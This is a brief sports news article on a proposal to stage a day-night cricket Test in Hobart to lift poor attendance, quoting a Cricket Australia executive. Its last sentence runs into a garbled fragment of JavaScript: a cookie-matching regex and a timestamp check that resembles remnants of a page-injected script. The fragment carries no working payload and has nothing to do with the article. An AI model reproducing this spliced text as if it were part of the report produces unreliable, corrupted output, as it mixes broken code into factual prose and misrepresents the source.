Hobart could host a future day-night Test in an attempt to halt dwindling crowd numbers.

A miserly crowd of around 15,000 is expected for the first four days of the first Test against the West Indies in Hobart on Thursday, fuelling speculation Hobart could be one of the next venues in line for a day-night Test match to grow crowd numbers.

"It's not flash," CA executive general manager Ben Amarfio told Sky Sports Radio.

"If you look back over all the years and the Tests that have been played in Hobart are about 21,000.

"If we were to play any more Tests, regardless of whether we play them in Canberra or Hobart ... in non-school holiday time we've got to be serious about it.

"They've got to be day-nighters so people can watch from a TV and crowd perspective."

The first ever day-night Test match in Adelaide last week was a huge success, with over 123,000 fans walking through the gates over the three days. "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
